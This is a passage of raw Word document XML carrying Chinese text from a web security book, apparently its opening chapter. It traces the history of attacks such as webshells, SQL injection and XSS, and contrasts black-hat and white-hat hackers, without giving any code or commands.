        </w:rPr>
        <w:t>服务越来越少，且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>技术的成熟使得 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>应用的功能越来越强大，最终成为了互联网的主流。黑客们的目光，也渐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>渐转移到了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>这块大蛋糕上。</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rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="113"/>
        <w:ind w:left="402" w:right="389" w:hanging="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:15.65pt;margin-top:-135.049606pt;width:405.35pt;height:142.050pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2512" coordorigin="313,-2701" coordsize="8107,2841">
            <v:shape style="position:absolute;left:313;top:-2606;width:8107;height:2745" coordorigin="313,-2605" coordsize="8107,2745" path="m8196,-2605l537,-2605,466,-2594,405,-2562,356,-2514,324,-2452,313,-2382,313,-84,324,-13,356,48,405,97,466,128,537,140,8196,140,8267,128,8328,97,8377,48,8409,-13,8420,-84,8420,-2382,8409,-2452,8377,-2514,8328,-2562,8267,-2594,8196,-2605xe" filled="true" fillcolor="#e7e7e7" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:510;top:-2701;width:397;height:449" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId18" o:title=""/>
            </v:shape>
            <v:shape style="position:absolute;left:313;top:-2701;width:8107;height:2841" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto" w:before="9"/>
                      <w:rPr>
                        <w:rFonts w:ascii="PMingLiU"/>
                        <w:sz w:val="22"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
                      <w:ind w:left="168" w:right="172" w:firstLine="400"/>
                      <w:jc w:val="both"/>
                      <w:rPr>
                        <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
                        <w:spacing w:val="-5"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>实际上，在互联网安全领域所经历的这个阶段，还有另外一个重要的分支，即桌面软    </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
                        <w:spacing w:val="-8"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>件安全，或者叫客户端软件安全。其代表是浏览器攻击。一个典型的攻击场景是，黑客构     </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
                        <w:spacing w:val="-10"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>造一个恶意网页，诱使用户使用浏览器访问该网页，利用浏览器中存在的某些漏洞，比如    </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
                        <w:spacing w:val="-11"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>一个缓冲区溢出漏洞，执行 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>shellcode</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
                        <w:spacing w:val="-1"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>，通常是下载一个木马并在用户机器里执行。常见的</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>针对桌面软件的攻击目标，还包括微软的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Office </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>系列软件、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Adobe Acrobat Reader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>、多媒体播放软件、压缩软件等装机量大的流行软件，都曾经成为黑客们的最爱。但是这种攻击， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>和本书要讨论的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全还是有着本质的区别，所以即使浏览器安全是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全的重要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>组成部分，但在本书中，也只会讨论浏览器和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>安全有关的部分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="535" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="117" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250015" w:id="22"/>
      <w:bookmarkStart w:name="1.2  黑帽子，白帽子" w:id="23"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkStart w:name="1.2  黑帽子，白帽子" w:id="24"/>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:bookmarkStart w:name="1.1.3  Web安全的兴起" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t> 安全的兴起</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="202" w:right="223" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>攻击技术的发展也可以分为几个阶段。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>时代，人们更多的是关注服务器端动态脚本的安全问题，比如将一个可执行脚本（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t>俗称 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）上传到服务器上，从而获得权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>限。动态脚本语言的普及，以及 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>技术发展初期对安全问题认知的不足导致很多“血案”的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>发生，同时也遗留下很多历史问题，比如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>语言至今仍然只能靠较好的代码规范来保证没有文件包含漏洞，而无法从语言本身杜绝此类安全问题的发生。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="202" w:right="223" w:firstLine="402"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>注入的出现是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>安全史上的一个里程碑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>，它最早出现大概是在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1999 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>年，并很快就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t>成为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>安全的头号大敌。就如同缓冲区溢出出现时一样，程序员们不得不日以继夜地去修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>程序中存在的漏洞。黑客们发现通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>注入攻击，可以获取很多重要的、敏感的数据，甚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>至能够通过数据库获取系统访问权限，这种效果并不比直接攻击系统软件差，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击一下子就流行起来。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>注入漏洞至今仍然是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>安全领域中的一个重要组成部分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="202" w:right="224" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>跨站脚本攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>的出现则是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>安全史上的另一个里程碑。实际上，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的出现时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>间和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>注入差不多，但是真正引起人们重视则是在大概 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2003 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>年以后。在经历了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MySpace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>蠕虫事件后，安全界对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>的重视程度提高了很多，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2007 TOP 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>威胁甚至把</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="exact"/>
        <w:ind w:left="202"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>排在榜首。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>伴随着 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的兴起，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>等攻击已经变得更为强大。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击的思路也从服</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>务器端转向了客户端，转向了浏览器和用户。黑客们天马行空的思路，覆盖了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的每一个环节，变得更加的多样化，这些安全问题，在本书后续的章节中会深入地探讨。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="120" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>技术发展到今天，构建出了丰富多彩的互联网。互联网业务的蓬勃发展，也催生出了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>许多新兴的脚本语言，比如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ruby</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NodeJS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>等，敏捷开发成为互联网的主旋律。而手</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>机技术、移动互联网的兴起，也给 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>带来了新的机遇和挑战。与此同时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>安全技术， 也将紧跟着互联网发展的脚步，不断地演化出新的变化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250014" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>黑帽子，白帽子</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="299"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>正如一个硬币有两面一样，“黑客”也有好坏之分。在黑客的世界中，往往用帽子的颜色</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>来比喻黑客的好坏。白帽子，则是指那些精通安全技术，但是工作在反黑客领域的专家们；而黑帽子，则是指利用黑客技术造成破坏，甚至进行网络犯罪的群体。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="156"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>同样是研究安全，白帽子和黑帽子在工作时的心态是完全不同的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>对于黑帽子来说，只要能够找到系统的一个弱点，就可以达到入侵系统的目的；而对于白</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>帽子来说，必须找到系统的所有弱点，不能有遗漏，才能保证系统不会出现问题。这种差异是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>由于工作环境与工作目标的不同所导致的。白帽子一般为企业或安全公司服务，工作的出发点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>就是要解决所有的安全问题，因此所看所想必然要求更加的全面、宏观；黑帽子的主要目的是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
